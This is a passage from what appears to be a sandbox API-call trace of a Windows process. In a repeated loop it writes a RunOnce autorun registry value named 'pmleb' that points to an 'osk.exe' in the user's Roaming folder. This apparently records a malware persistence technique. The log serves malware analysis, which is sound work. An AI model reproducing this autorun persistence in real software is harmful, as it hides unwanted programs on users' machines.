0x0 [0100.222] RegCloseKey (hKey=0x280) returned 0x0 [0100.222] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.222] SetTimer (hWnd=0x20280, nIDEvent=0x234d, uElapse=0xa, lpTimerFunc=0x0) returned 0x234d [0100.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.246] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.246] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.246] KillTimer (hWnd=0x20280, uIDEvent=0x234d) returned 1 [0100.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.246] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.247] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.247] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.247] RegCloseKey (hKey=0x280) returned 0x0 [0100.247] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.247] SetTimer (hWnd=0x20280, nIDEvent=0x234e, uElapse=0xa, lpTimerFunc=0x0) returned 0x234e [0100.247] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.251] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.251] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.251] KillTimer (hWnd=0x20280, uIDEvent=0x234e) returned 1 [0100.252] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.252] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.252] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.252] RegCloseKey (hKey=0x280) returned 0x0 [0100.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.253] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.253] SetTimer (hWnd=0x20280, nIDEvent=0x234f, uElapse=0xa, lpTimerFunc=0x0) returned 0x234f [0100.253] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.267] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.267] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.267] KillTimer (hWnd=0x20280, uIDEvent=0x234f) returned 1 [0100.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.268] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.268] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.268] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.268] RegCloseKey (hKey=0x280) returned 0x0 [0100.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.268] SetTimer (hWnd=0x20280, nIDEvent=0x2350, uElapse=0xa, lpTimerFunc=0x0) returned 0x2350 [0100.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.283] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.283] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.283] KillTimer (hWnd=0x20280, uIDEvent=0x2350) returned 1 [0100.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.284] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.284] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.284] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.284] RegCloseKey (hKey=0x280) returned 0x0 [0100.285] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.285] SetTimer (hWnd=0x20280, nIDEvent=0x2351, uElapse=0xa, lpTimerFunc=0x0) returned 0x2351 [0100.285] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.298] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.298] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.298] KillTimer (hWnd=0x20280, uIDEvent=0x2351) returned 1 [0100.298] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.299] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.299] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.299] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.299] RegCloseKey (hKey=0x280) returned 0x0 [0100.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.299] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.299] SetTimer (hWnd=0x20280, nIDEvent=0x2352, uElapse=0xa, lpTimerFunc=0x0) returned 0x2352 [0100.300] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.313] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.313] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.314] KillTimer (hWnd=0x20280, uIDEvent=0x2352) returned 1 [0100.314] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.314] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.314] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.315] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.315] RegCloseKey (hKey=0x280) returned 0x0 [0100.315] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.315] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.315] SetTimer (hWnd=0x20280, nIDEvent=0x2353, uElapse=0xa, lpTimerFunc=0x0) returned 0x2353 [0100.315] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.330] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.330] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.330] KillTimer (hWnd=0x20280, uIDEvent=0x2353) returned 1 [0100.331] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.331] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.331] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.331] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.331] RegCloseKey (hKey=0x280) returned 0x0 [0100.332] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.332] SetTimer (hWnd=0x20280, nIDEvent=0x2354, uElapse=0xa, lpTimerFunc=0x0) returned 0x2354 [0100.332] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.345] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.345] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.345] KillTimer (hWnd=0x20280, uIDEvent=0x2354) returned 1 [0100.345] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.345] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.346] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.346] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.346] RegCloseKey (hKey=0x280) returned 0x0 [0100.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.346] SetTimer (hWnd=0x20280, nIDEvent=0x2355, uElapse=0xa, lpTimerFunc=0x0) returned 0x2355 [0100.346] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.360] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.360] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.360] KillTimer (hWnd=0x20280, uIDEvent=0x2355) returned 1 [0100.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.362] RegCloseKey (hKey=0x280) returned 0x0 [0100.362] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.362] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.362] SetTimer (hWnd=0x20280, nIDEvent=0x2356, uElapse=0xa, lpTimerFunc=0x0) returned 0x2356 [0100.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.398] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.398] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.398] KillTimer (hWnd=0x20280, uIDEvent=0x2356) returned 1 [0100.398] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.399] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.399] RegCloseKey (hKey=0x280) returned 0x0 [0100.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.399] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.400] SetTimer (hWnd=0x20280, nIDEvent=0x2357, uElapse=0xa, lpTimerFunc=0x0) returned 0x2357 [0100.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.407] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.407] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.407] KillTimer (hWnd=0x20280, uIDEvent=0x2357) returned 1 [0100.408] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.408] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.408] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.408] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.409] RegCloseKey (hKey=0x280) returned 0x0 [0100.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.409] SetTimer (hWnd=0x20280, nIDEvent=0x2358, uElapse=0xa, lpTimerFunc=0x0) returned 0x2358 [0100.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.423] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.423] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.423] KillTimer (hWnd=0x20280, uIDEvent=0x2358) returned 1 [0100.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.424] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.424] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.425] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.425] RegCloseKey (hKey=0x280) returned 0x0 [0100.425] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.425] SetTimer (hWnd=0x20280, nIDEvent=0x2359, uElapse=0xa, lpTimerFunc=0x0) returned 0x2359 [0100.425] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.438] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.439] KillTimer (hWnd=0x20280, uIDEvent=0x2359) returned 1 [0100.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.439] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.439] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.440] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.440] RegCloseKey (hKey=0x280) returned 0x0 [0100.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.440] SetTimer (hWnd=0x20280, nIDEvent=0x235a, uElapse=0xa, lpTimerFunc=0x0) returned 0x235a [0100.440] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.454] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.454] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.454] KillTimer (hWnd=0x20280, uIDEvent=0x235a) returned 1 [0100.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.455] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.455] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.455] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.455] RegCloseKey (hKey=0x280) returned 0x0 [0100.455] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.455] SetTimer (hWnd=0x20280, nIDEvent=0x235b, uElapse=0xa, lpTimerFunc=0x0) returned 0x235b [0100.456] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.469] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.469] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.470] KillTimer (hWnd=0x20280, uIDEvent=0x235b) returned 1 [0100.470] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.470] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.471] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.471] RegCloseKey (hKey=0x280) returned 0x0 [0100.471] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.471] SetTimer (hWnd=0x20280, nIDEvent=0x235c, uElapse=0xa, lpTimerFunc=0x0) returned 0x235c [0100.471] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.485] KillTimer (hWnd=0x20280, uIDEvent=0x235c) returned 1 [0100.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.486] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.486] RegCloseKey (hKey=0x280) returned 0x0 [0100.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.487] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.487] SetTimer (hWnd=0x20280, nIDEvent=0x235d, uElapse=0xa, lpTimerFunc=0x0) returned 0x235d [0100.487] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.501] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.501] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.501] KillTimer (hWnd=0x20280, uIDEvent=0x235d) returned 1 [0100.501] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.502] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.502] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.502] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.502] RegCloseKey (hKey=0x280) returned 0x0 [0100.502] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.502] SetTimer (hWnd=0x20280, nIDEvent=0x235e, uElapse=0xa, lpTimerFunc=0x0) returned 0x235e [0100.502] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.522] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.522] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.522] KillTimer (hWnd=0x20280, uIDEvent=0x235e) returned 1 [0100.523] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.523] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.523] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.523] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.523] RegCloseKey (hKey=0x280) returned 0x0 [0100.524] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.524] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.524] SetTimer (hWnd=0x20280, nIDEvent=0x235f, uElapse=0xa, lpTimerFunc=0x0) returned 0x235f [0100.524] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.532] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.532] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.532] KillTimer (hWnd=0x20280, uIDEvent=0x235f) returned 1 [0100.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.533] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 